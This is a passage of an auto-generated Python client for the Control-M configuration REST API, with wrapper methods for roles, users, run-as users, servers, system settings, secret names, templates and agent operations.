ValueError("Missing the required parameter `server` when calling `get_pgp_templates`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_pgp_templates`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] if 'name' in params: query_params.append(('name', params['name'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/pgptemplates', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[PgpTemplateData]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_role(self, role, **kwargs): # noqa: E501 """Get Authorization Role # noqa: E501 Get Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_role(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: RoleData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_role_with_http_info(role, **kwargs) # noqa: E501 else: (data) = self.get_role_with_http_info(role, **kwargs) # noqa: E501 return data def get_role_with_http_info(self, role, **kwargs): # noqa: E501 """Get Authorization Role # noqa: E501 Get Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_role_with_http_info(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: The Role name. (required) :return: RoleData If the method is called asynchronously, returns the request thread. """ all_params = ['role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `get_role`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RoleData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_role_associates(self, role, **kwargs): # noqa: E501 """Get all authorization entities associated with role # noqa: E501 Get all authorization entities associated with role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_role_associates(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: role name. (required) :return: list[AssociateData] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_role_associates_with_http_info(role, **kwargs) # noqa: E501 else: (data) = self.get_role_associates_with_http_info(role, **kwargs) # noqa: E501 return data def get_role_associates_with_http_info(self, role, **kwargs): # noqa: E501 """Get all authorization entities associated with role # noqa: E501 Get all authorization entities associated with role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_role_associates_with_http_info(role, async_req=True) >>> result = thread.get() :param async_req bool :param str role: role name. (required) :return: list[AssociateData] If the method is called asynchronously, returns the request thread. """ all_params = ['role'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_role_associates" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role' is set if self.api_client.client_side_validation and ('role' not in params or params['role'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role` when calling `get_role_associates`") # noqa: E501 collection_formats = {} path_params = {} if 'role' in params: path_params['role'] = params['role'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/{role}/associates', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[AssociateData]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_run_as_user(self, server, agent, user, **kwargs): # noqa: E501 """Get Run-as user # noqa: E501 Get Run-as user details from server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_run_as_user(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :return: RunAsUserData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 else: (data) = self.get_run_as_user_with_http_info(server, agent, user, **kwargs) # noqa: E501 return data def get_run_as_user_with_http_info(self, server, agent, user, **kwargs): # noqa: E501 """Get Run-as user # noqa: E501 Get Run-as user details from server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_run_as_user_with_http_info(server, agent, user, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent (required) :param str user: The user name (required) :return: RunAsUserData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'user'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_run_as_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_run_as_user`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_run_as_user`") # noqa: E501 # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `get_run_as_user`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasuser/{agent}/{user}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RunAsUserData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_run_as_users_list(self, server, **kwargs): # noqa: E501 """Get Run-as user list that match the requested search criteria. # noqa: E501 Get Run-as user list that match the requested search criteria from server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_run_as_users_list(server, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str user: The Run-as user. :param str agent: The agent. :return: RunAsUsersList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_run_as_users_list_with_http_info(server, **kwargs) # noqa: E501 else: (data) = self.get_run_as_users_list_with_http_info(server, **kwargs) # noqa: E501 return data def get_run_as_users_list_with_http_info(self, server, **kwargs): # noqa: E501 """Get Run-as user list that match the requested search criteria. # noqa: E501 Get Run-as user list that match the requested search criteria from server. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_run_as_users_list_with_http_info(server, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str user: The Run-as user. :param str agent: The agent. :return: RunAsUsersList If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'user', 'agent'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_run_as_users_list" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_run_as_users_list`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 query_params = [] if 'user' in params: query_params.append(('user', params['user'])) # noqa: E501 if 'agent' in params: query_params.append(('agent', params['agent'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/runasusers', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RunAsUsersList', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_servers(self, **kwargs): # noqa: E501 """get all the Servers name and hostname in the system # noqa: E501 Get the names and hostnames of all Servers in the system. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_servers(async_req=True) >>> result = thread.get() :param async_req bool :return: CtmDetailsList If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_servers_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_servers_with_http_info(**kwargs) # noqa: E501 return data def get_servers_with_http_info(self, **kwargs): # noqa: E501 """get all the Servers name and hostname in the system # noqa: E501 Get the names and hostnames of all Servers in the system. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_servers_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: CtmDetailsList If the method is called asynchronously, returns the request thread. """ all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_servers" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/servers', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='CtmDetailsList', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_system_setting(self, **kwargs): # noqa: E501 """Get system setting for Control-M environment # noqa: E501 Get system setting for Control-M environment # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_system_setting(async_req=True) >>> result = thread.get() :param async_req bool :param str server: Server to which the system settings are applied :return: SystemSetting If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_system_setting_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_system_setting_with_http_info(**kwargs) # noqa: E501 return data def get_system_setting_with_http_info(self, **kwargs): # noqa: E501 """Get system setting for Control-M environment # noqa: E501 Get system setting for Control-M environment # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_system_setting_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :param str server: Server to which the system settings are applied :return: SystemSetting If the method is called asynchronously, returns the request thread. """ all_params = ['server'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_system_setting" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] if 'server' in params: query_params.append(('server', params['server'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/systemsettings', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SystemSetting', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_user(self, user, **kwargs): # noqa: E501 """Get user # noqa: E501 Get user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_user(user, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :return: UserData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_user_with_http_info(user, **kwargs) # noqa: E501 else: (data) = self.get_user_with_http_info(user, **kwargs) # noqa: E501 return data def get_user_with_http_info(self, user, **kwargs): # noqa: E501 """Get user # noqa: E501 Get user # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_user_with_http_info(user, async_req=True) >>> result = thread.get() :param async_req bool :param str user: The user name. (required) :return: UserData If the method is called asynchronously, returns the request thread. """ all_params = ['user'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_user" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'user' is set if self.api_client.client_side_validation and ('user' not in params or params['user'] is None): # noqa: E501 raise ValueError("Missing the required parameter `user` when calling `get_user`") # noqa: E501 collection_formats = {} path_params = {} if 'user' in params: path_params['user'] = params['user'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/{user}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='UserData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_user_effective_rights(self, **kwargs): # noqa: E501 """Get user real effective authorizations # noqa: E501 Get user real effective authorizations by all his roles # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_user_effective_rights(async_req=True) >>> result = thread.get() :param async_req bool :return: RoleData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_user_effective_rights_with_http_info(**kwargs) # noqa: E501 else: (data) = self.get_user_effective_rights_with_http_info(**kwargs) # noqa: E501 return data def get_user_effective_rights_with_http_info(self, **kwargs): # noqa: E501 """Get user real effective authorizations # noqa: E501 Get user real effective authorizations by all his roles # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_user_effective_rights_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: RoleData If the method is called asynchronously, returns the request thread. """ all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_user_effective_rights" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/user/effectiveRights', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='RoleData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def get_zos_templates(self, server, agent, **kwargs): # noqa: E501 """Get z/OS Templates # noqa: E501 Get z/OS Templates # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_zos_templates(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str name: The z/OS Template Name :return: list[ZosTemplateData] If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.get_zos_templates_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.get_zos_templates_with_http_info(server, agent, **kwargs) # noqa: E501 return data def get_zos_templates_with_http_info(self, server, agent, **kwargs): # noqa: E501 """Get z/OS Templates # noqa: E501 Get z/OS Templates # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.get_zos_templates_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server (required) :param str agent: The Agent (required) :param str name: The z/OS Template Name :return: list[ZosTemplateData] If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'name'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_zos_templates" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `get_zos_templates`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `get_zos_templates`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] if 'name' in params: query_params.append(('name', params['name'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/mft/zostemplates', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='list[ZosTemplateData]', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def import_role(self, role_file, **kwargs): # noqa: E501 """Import Authorization Role # noqa: E501 Import Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.import_role(role_file, async_req=True) >>> result = thread.get() :param async_req bool :param file role_file: File with contenet of RoleDataFull. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.import_role_with_http_info(role_file, **kwargs) # noqa: E501 else: (data) = self.import_role_with_http_info(role_file, **kwargs) # noqa: E501 return data def import_role_with_http_info(self, role_file, **kwargs): # noqa: E501 """Import Authorization Role # noqa: E501 Import Authorization Role # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.import_role_with_http_info(role_file, async_req=True) >>> result = thread.get() :param async_req bool :param file role_file: File with contenet of RoleDataFull. (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['role_file'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method import_role" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'role_file' is set if self.api_client.client_side_validation and ('role_file' not in params or params['role_file'] is None): # noqa: E501 raise ValueError("Missing the required parameter `role_file` when calling `import_role`") # noqa: E501 collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} if 'role_file' in params: local_var_files['roleFile'] = params['role_file'] # noqa: E501 body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # HTTP header `Content-Type` header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501 ['multipart/form-data']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/authorization/role/import', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def list_secrets(self, **kwargs): # noqa: E501 """Get list of secret names # noqa: E501 Get the list of names of all the secrets in the vault # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.list_secrets(async_req=True) >>> result = thread.get() :param async_req bool :return: StringListResult If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.list_secrets_with_http_info(**kwargs) # noqa: E501 else: (data) = self.list_secrets_with_http_info(**kwargs) # noqa: E501 return data def list_secrets_with_http_info(self, **kwargs): # noqa: E501 """Get list of secret names # noqa: E501 Get the list of names of all the secrets in the vault # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.list_secrets_with_http_info(async_req=True) >>> result = thread.get() :param async_req bool :return: StringListResult If the method is called asynchronously, returns the request thread. """ all_params = [] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method list_secrets" % key ) params[key] = val del params['kwargs'] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/secrets', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='StringListResult', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def ping_agent(self, server, agent, **kwargs): # noqa: E501 """ping to the agent in the Server # noqa: E501 Ping an Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ping_agent(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent. (required) :param PingAgentParams body: :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.ping_agent_with_http_info(server, agent, **kwargs) # noqa: E501 else: (data) = self.ping_agent_with_http_info(server, agent, **kwargs) # noqa: E501 return data def ping_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501 """ping to the agent in the Server # noqa: E501 Ping an Agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ping_agent_with_http_info(server, agent, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server. (required) :param str agent: The Agent. (required) :param PingAgentParams body: :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['server', 'agent', 'body'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method ping_agent" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'server' is set if self.api_client.client_side_validation and ('server' not in params or params['server'] is None): # noqa: E501 raise ValueError("Missing the required parameter `server` when calling `ping_agent`") # noqa: E501 # verify the required parameter 'agent' is set if self.api_client.client_side_validation and ('agent' not in params or params['agent'] is None): # noqa: E501 raise ValueError("Missing the required parameter `agent` when calling `ping_agent`") # noqa: E501 collection_formats = {} path_params = {} if 'server' in params: path_params['server'] = params['server'] # noqa: E501 if 'agent' in params: path_params['agent'] = params['agent'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None if 'body' in params: body_params = params['body'] # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/server/{server}/agent/{agent}/ping', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def recycle_item(self, id, **kwargs): # noqa: E501 """recycle item # noqa: E501 Recycle an item # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.recycle_item(id, async_req=True) >>> result = thread.get() :param async_req bool :param str id: item data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ kwargs['_return_http_data_only'] = True if kwargs.get('async_req'): return self.recycle_item_with_http_info(id, **kwargs) # noqa: E501 else: (data) = self.recycle_item_with_http_info(id, **kwargs) # noqa: E501 return data def recycle_item_with_http_info(self, id, **kwargs): # noqa: E501 """recycle item # noqa: E501 Recycle an item # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.recycle_item_with_http_info(id, async_req=True) >>> result = thread.get() :param async_req bool :param str id: item data (required) :return: SuccessData If the method is called asynchronously, returns the request thread. """ all_params = ['id'] # noqa: E501 all_params.append('async_req') all_params.append('_return_http_data_only') all_params.append('_preload_content') all_params.append('_request_timeout') params = locals() for key, val in six.iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method recycle_item" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in params or params['id'] is None): # noqa: E501 raise ValueError("Missing the required parameter `id` when calling `recycle_item`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in params: path_params['id'] = params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKeyAuth'] # noqa: E501 return self.api_client.call_api( '/config/item/{id}/recycle', 'POST', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type='SuccessData', # noqa: E501 auth_settings=auth_settings, async_req=params.get('async_req'), _return_http_data_only=params.get('_return_http_data_only'), _preload_content=params.get('_preload_content', True), _request_timeout=params.get('_request_timeout'), collection_formats=collection_formats) def set_agent_parameter(self, server, agent, name, **kwargs): # noqa: E501 """set agent parameter # noqa: E501 Set the value of the specified parameter in the specified agent. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.set_agent_parameter(server, agent, name, async_req=True) >>> result = thread.get() :param async_req bool :param str server: The Server the agent is connected to. (required) :param str agent: The name of the agent to update. (required) :param str name: The parameter name. (required) :param 